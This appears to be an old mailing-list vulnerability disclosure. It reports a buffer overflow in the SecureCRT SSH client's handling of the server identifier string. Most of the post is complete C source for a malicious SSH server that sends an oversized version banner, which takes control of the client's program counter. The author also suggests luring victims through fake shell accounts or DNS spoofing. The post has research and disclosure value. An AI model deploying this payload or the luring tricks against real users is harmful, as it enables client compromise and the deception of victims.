SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug in a seemlingly trivial portion of its SSH connection code. When an SSH Client connects to a server, the server sends a version string containing minor and major numbers for the protocol, as well as a server-specific identifier string which is specified to be no more than 40 bytes long. Unfortunetly the SecureCRT code which handles errors relating to an unsupported protocol version contains an unchecked buffer overflow when dealing with this identifier string. The following C code is given to reproduce this bug (yes I know Perl would have been shorter, sorry): #include #include #include #include #define PORT 9988 int main(int argc, char **argv) { int s, n, i, sz = sizeof(struct sockaddr_in); struct sockaddr_in local, whatever; char payload[510]; strcpy(payload, "SSH-1.1-"); for (i = 8; i < 508; i++) payload[i] = 'A'; payload[508] = '\n'; payload[509] = '\0'; if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); return 1; } local.sin_family = AF_INET; local.sin_port = htons(PORT); local.sin_addr.s_addr = INADDR_ANY; memset(&(local.sin_zero), 0, 8); if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) { perror("bind"); return 1; } if (listen(s, 2) == -1) { perror("listen"); return 1; } printf("waiting for connection...\n"); if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) { perror("accept"); return 1; } printf("client connected\n"); if (send(n, payload, sizeof(payload) - 1, 0) == -1) { perror("send"); return 1; } printf("sent string: [%s]\n", payload); close(n); close(s); return 0; } After starting the (fake) server, run the SecureCRT client, attach a debugger and connect. Notice the value of PC is now 0x41414141...coincidence? There are a number of ways to trick people into connecting to your ssh server, i.e. telling them you've given them an account on your shell, dns spoofing etc. Big shout-out to Lagow, Biggie Smalls (up in heaven), Gweeds, & the whole Mr. Mittens crew - Kyuzo